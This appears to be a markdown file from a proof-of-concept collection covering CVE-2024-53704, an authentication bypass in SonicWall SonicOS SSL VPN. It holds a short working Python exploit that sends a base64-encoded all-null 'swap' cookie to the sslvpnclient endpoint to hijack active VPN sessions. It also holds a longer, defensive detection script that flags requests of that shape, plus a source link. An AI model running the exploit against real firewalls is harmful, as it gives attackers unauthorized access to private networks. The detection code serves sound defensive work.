POC/wpoc/SonicWall/SonicOS-SSLVPN身份验证绕过漏洞(CVE-2024-53704).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00


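# SonicOS SSLVPN Authentication Bypass Vulnerability (CVE-2024-53704)
**An authentication bypass in SonicWall firewalls allows a remote attacker to hijack active SSL VPN sessions and gain unauthorized network access. SonicOS versions 7.1.x (7.1.1-7058 and above), 7.1.2-7019, and 8.0.0-8035 are affected.**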
## poc
```python
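import base64, requests, urllib3, warnings

# Suppress the certificate warning triggered by verify=False
warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning)

resp = requests.get(
    "https://192.168.50.189:4433/cgi-bin/sslvpnclient?launchplatform=",
    # swap cookie: base64 encoding of 32 null bytes
    cookies={"swap": base64.b64encode(b"\x00" * 32).decode()},
    verify=False,
)
print(resp.headers)
print(resp.text)  # requests.Response exposes the body as .text, not .body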
```
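
For detection, the request shape of the PoC above (the `/cgi-bin/sslvpnclient` path with a `swap` cookie that base64-decodes to nothing but null bytes) can be matched wherever decrypted HTTP request headers are available. The following is an added example, not part of the original file or the referenced write-up; the raw-request input format, the sample requests, the host name and the function names are constructed for illustration.

```python
import base64
import binascii
from urllib.parse import unquote, urlsplit

TARGET_PATH = "/cgi-bin/sslvpnclient"  # endpoint requested by the PoC above

def swap_is_all_null(value: str) -> bool:
    """True if the cookie value base64-decodes to a non-empty run of 0x00 bytes."""
    value = unquote(value).strip('"')
    try:
        # Re-pad so values logged without trailing '=' still decode
        raw = base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
    except (binascii.Error, ValueError):
        return False
    return len(raw) > 0 and raw.count(0) == len(raw)

def parse_request(raw: str):
    """Return (path, cookies) from raw HTTP request header text."""
    lines = raw.strip().splitlines()
    parts = lines[0].split() if lines else []
    path = urlsplit(parts[1]).path if len(parts) >= 2 else ""
    cookies = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "cookie":
            for pair in value.split(";"):
                key, _, val = pair.strip().partition("=")
                cookies[key] = val
    return path, cookies

def is_suspicious(raw: str) -> bool:
    """Flag requests to the SSL VPN client endpoint carrying an all-null swap cookie."""
    path, cookies = parse_request(raw)
    return path == TARGET_PATH and swap_is_all_null(cookies.get("swap", ""))

def _req(target: str, cookie: str) -> str:
    return f"GET {target} HTTP/1.1\r\nHost: vpn.example.test:4433\r\nCookie: {cookie}\r\n\r\n"

# Constructed sample requests (not captured traffic)
SAMPLES = {
    "poc_shape": _req("/cgi-bin/sslvpnclient?launchplatform=", "swap=" + "A" * 43 + "="),
    "unpadded": _req("/cgi-bin/sslvpnclient?launchplatform=", "lang=en; swap=" + "A" * 43),
    "random_swap": _req("/cgi-bin/sslvpnclient?launchplatform=",
                        "swap=" + base64.b64encode(bytes(range(1, 33))).decode()),
    "other_path": _req("/index.html", "swap=" + "A" * 43 + "="),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name}: {'ALERT' if is_suspicious(raw) else 'ok'}")
```

The check keys on the decoded cookie content rather than the literal string, so it also matches null-byte values of other lengths or with the padding stripped.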
## Vulnerability source
- https://bishopfox.com/blog/sonicwall-cve-2024-53704-ssl-vpn-session-hijacking